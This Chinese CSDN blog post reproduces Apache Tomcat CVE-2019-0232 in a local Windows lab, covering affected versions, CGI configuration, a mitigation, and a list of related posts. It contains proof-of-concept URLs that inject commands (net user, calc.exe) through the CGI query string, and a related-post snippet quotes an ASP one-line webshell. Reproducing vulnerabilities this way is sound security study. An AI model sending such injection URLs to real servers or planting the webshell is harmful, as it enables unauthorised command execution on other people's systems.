JAVA CGI 远程代码执行_Apache Tomcat 远程代码执行漏洞(CVE-2019-0232)漏洞复现

最新推荐文章于 2024-07-22 09:20:35 发布
最新推荐文章于 2024-07-22 09:20:35 发布
阅读量295 收藏 1
点赞数
文章标签: JAVA CGI 远程代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32018297/article/details/114823902
版权

一、     漏洞简介

漏洞编号和级别

CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方未评定。

漏洞概述

Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。

4月11日,Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞(CVE-2019-0232),由于JRE将命令行参数传递给Windows的方式存在错误,会导致CGI Servlet受到远程执行代码的攻击。

触发该漏洞需要同时满足以下条件:

1. 系统为Windows

2. 启用了CGI Servlet(默认为关闭)

3. 启用了enableCmdLineArguments(Tomcat 9.0.*及官方未来发布版本默认为关闭)

影响范围

Apache Tomcat 9.0.0.M1 to 9.0.17

Apache Tomcat 8.5.0 to 8.5.39

Apache Tomcat 7.0.0 to 7.0.93

二、     漏洞复现

环境介绍

服务端:Windows Server 2008 R2 Enterprise

Apache Tomcat 8.5.39

JDK 1.8.0_181

漏洞环境搭建

java环境安装

1、官网下载jdk安装包

2、根据提示安装jdk

d82115db45ece927702c3f8f28e5236c.png

3、配置路径,我的电脑->属性->高级系统设置->环境变量->ath 添加jdk和jre路径

57a4016b24bec5f8d7007bb9952da3cf.png

(环境变量配置失败可以直接在setclasspath.bat的开头手动声明环境变量)

73167b73a473146bad3eaaa91e040e5c.png

4、配置成功后如图:

68766a7047f1bc0bd6ccf600c4a9af04.png

Apache Tomcat安装

2、直接解压缩至你要安装的目录

b9cfc0e3ae8be1e0cdcf8daf91dcb2f2.png

3、安装成功后,运行startup.bat启动服务

54ff5ad4cdd62f15a6ec2ce768eec177.png

2a11e19c70f650f29e6726f83a0f2b34.png

配置Apache Tomcat服务器(修改conf目录配置文件,启用CGI)

1、打开Tomcat安装目录的apache-tomcat-8.5.39\conf\web.xml修改如下配置,在默认情况下配置是注释的。

57240dcfacd5b0641865a642ca460266.png

2、同时还要修改web.xml以下配置,否则访问cgi目录会提示404。

cd7c1890f6503ef146a90212616f8b42.png

3、打开Tomcat安装目录的apache-tomcat-8.5.39\conf\context.xml修改如下配置,添加privileged="true" 。

509d6eb8e0f7f7867e2d7da5285a8e63.png

4、在apache-tomcat-8.5.39\webapps\ROOT\WEB-INF目录新建一个cgi-bin文件夹,创建一个hello.bat的文件,内容如下:

7cce78bf5ec8af6df632e895911bcfc6.png

5、至此,此漏洞环境搭建完成

漏洞利用

Poc如下:

http://localhost:8080/cgi-bin/hello.bat?& C%3A%5CWindows%5CSystem32%5Cnet.exe+user

http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe

ddc6cd16613a0b45951ec7e863ffde6a.png

720fd654b474fda02815cd27753c5d25.png

漏洞复现成功。

三、     解决方案

Apache官方还未正式发布以上最新版本,受影响的用户请保持关注,在官方更新后尽快升级进行防护。与此同时,用户可以将CGI Servlet初始化参数enableCmdLineArguments设置为false来进行防护。

在Tomcat安装路径的conf文件夹下,使用编辑器打开web.xml,找到enableCmdLineArguments参数部分,添加如下配置:

07e013f12cdcb63df51f4d6614870c37.png

重启Tomcat服务,以确保配置生效。

四、     参考链接

https://github.com/jas502n/CVE-2019-0232

J.Gan
关注
Apache Tomcat 远程代码执行漏洞CVE-2019-0232漏洞复现
Sylon的博客
06-20 1万+
Apache Tomcat 远程代码执行漏洞CVE-2019-0232漏洞复现 一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-0232,危险级别:高危,CVSS分值:官方未评定。 漏洞概述 Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持...
JAVA CGI 远程代码执行_ApacheTomca远程执行代码CVE-2019-0232漏洞浅析和复现
weixin_31236309的博客
03-04 364
ApacheTomca远程执行代码(CVE-2019-0232)漏洞浅析和复现一、 漏洞背景Apache Tomcat,俗称Tomcat Server,是一个开源的JavaServlet容器,由社区在Apache Software Foundation(ASF)的支持下开发。它实现了多个Java EE规范,包括Java Servlet,JavaServer Pages(JSP),Java表达式语言...
"Java 反序列化"过程远程命令执行漏洞
weixin_33883178的博客
11-20 470
一、漏洞描述   国外 FoxGlove 安全研究团队于2015年11月06日在其博客上公开了一篇关于常见 Java 应用如何利用反序列化操作进行远程命令执行的文章。原博文所提到的 Java 应用都使用了 Apache Commons Collections 这个库,并且都存在一个序列化对象数据交互接口能够被访问到。针对每个应用,博文都提供了相应的分析和验证代码来说明 Java 应用存在远程命...
Tomcat系列漏洞复现
最新发布
Anubizs的博客
07-22 710
由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。在Tomcat的配置文件中设置了可写(readonly=false),导致可以往服务器写文件。文件,可以看到和我们POC读取的文件是一模一样的,因此,漏洞复现成功。抓包,然后发送如下数据包,可以上传jsp。
Java框架安全篇--log4j2远程代码执行漏洞
m0_63138919的博客
04-06 1411
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
java 2mi远程执行漏洞_Shiro RememberMe 1.2.4远程代码执行漏洞-详细分析
weixin_35799467的博客
02-27 409
本文首发于先知:0x01.漏洞复现环境配置测试需要一个vps ip提供rmi注册表服务,此时需要监听vps的1099端口,复现中以本机当作vps使用poc:importsysimportuuidimportbase64importsubprocessfrom Crypto.Cipher importAESdefencode_rememberme(command):popen= subprocess...
CVE-2019-0232TOMCAT远程代码执行漏洞复现
weixin_43806577的博客
08-27 2275
一、漏洞简介 2019年4月13号,Apache Tomcat 9.0.18版本公告中提到,本次更新修复了一个代号为CVE-2019-0232漏洞。 该漏洞只对Windows平台有效,Apache Tomcat 9.0.0.M1到9.0.17,8.5.0到8.5.39和7.0.0到7.0.93中的CGI Servlet很容易受到远程执行代码的影响,攻击者向CGI Servlet发送一个精心设...
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
2019年4月10日,Apache Tomcat官方发布了一个重要的安全公告,揭示了CVE-2019-0232漏洞,这是一个远程代码执行(RCE)漏洞,主要影响Windows平台上的Apache Tomcat实例。 **漏洞简介** CVE-2019-0232是一个由于...
CVE-2019-0232(Apache Tomcat 远程代码执行)漏洞复现
weixin_45540609的博客
07-28 848
一、漏洞简介 2019年4月10日,Apache Tomcat披露了一个漏洞漏洞编号为CVE-2019-0232,该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想 影响版本: Apache Tomcat 9.0.0.M1 to 9.0.
JAVA CGI 远程代码执行_【漏洞复现Tomcat CVE-2017-12615 远程代码执行漏洞
weixin_42474164的博客
02-27 517
漏洞描述【漏洞预警】Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏https://www.secfree.com/article-395.html漏洞作者iswin from 360-sg-lab (360观星实验室)漏洞等级高漏洞复现Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏...
远程代码执行漏洞的利用与防御
qq_61714717的博客
12-14 1571
RCE漏洞
IIS6.0,Apache低版本,PHP CGI 解析漏洞
weixin_30954265的博客
07-28 396
IIS6.0解析漏洞 在IIS6.0下存在这样的文件“名字.asp;名字.jpg” 代表了jpg文件可以以asp脚本类型的文件执行。 根据这个解析漏洞我们可以上传这种名字类型的图片,比如 1.asp;xxx.jpg 他会忽略;后边的内容,所以文件相当于1.asp asp一句话木马 <%eval request ("pass")%> 找到上传的路径后,可以直接用菜刀连接。如果对文...
CVE-2019-0232漏洞复现
whh6tl的博客
07-25 6912
漏洞简介 2019年4月10日,Apache Tomcat披露了一个漏洞漏洞编号为CVE-2019-0232,该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想。 威胁类型 远程代码执行、提权; 威胁等级 高 漏洞编号 CVE-2019-023
第一次复现漏洞 远程代码执行漏洞(CVE-2019-0232)
qq_31314583的博客
11-25 2695
写在前面 在公司呆了一段时间了,bug写了一小堆之后,我居然要开始接触漏洞的东西了,阿巴阿巴。还好这段时间老师带我,同事帮我,所幸没出什么错。然后今天第一次接触漏洞漏洞是啥。名声在外,但是一直没实操过。于是今天。 纷争开始了... 参考博客: 参考博客一:这篇手把手教你复现 参考博客二:这篇是原理 复现要求环境: 这是一个Apache Tomcat 远程代码执行漏洞。 配置要求: ...
tomcat漏洞
qq_43211632的博客
08-26 568
一、检测到目标URL存在http host头攻击漏洞 1.1问题 1.2解决方案: 1.3参考文档:https://blog.csdn.net/doulicau/article/details/106685476 二、 检测到目标主机可能存在缓慢的HTTP拒绝服务攻击 1.1问题 1.2解决方案: 1.3参考文档:https://blog.csdn.net/qq_34775355/article/details/106620739 三、检测到目标站点存在javascript框架库漏洞 1、问题:修改
深入浅出带你学习Tomcat中间件常见漏洞
梅花寺
02-16 619
Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。它的特点可以简单简述为:1.配置简单2.安全管理3.易操作4.集成方便了解完上述内容后,我们来学习一下Tomcat常见的漏洞以及利用方法。
CVE-2019-0232Apache Tomcat RCE漏洞
systemino的博客
04-27 2995
Apache Tomcat是在Apache Software Foundation (ASF)支持下开发的开源Java Servlet容器,实现了多个Java EE规范,包括Java Servlet, JavaServer Pages (JSP), Java Expression Language (EL), WebSocket,提供一个Java代码运行的纯Java HTTP web服务器环境。 ...
Tomcat 又爆出高危漏洞!!Tomcat 8.5 ~ 10 中招…
sinat_32849897的博客
07-02 1367
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。不要使用含有漏洞的组件每次也都被评...
Apache Tomcat 2019CVE-0232:Windows上可利用的远程代码执行漏洞详解
Apache Tomcat CVE-2019-0232 是一个重要的远程代码执行漏洞,于2019年4月被Apache Tomcat团队发现。该漏洞主要影响Windows上的Apache Tomcat版本,包括9.0.0.M1到9.0.17、8.5.0到8.5.39以及7.0.0到7.0.93。漏洞源于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值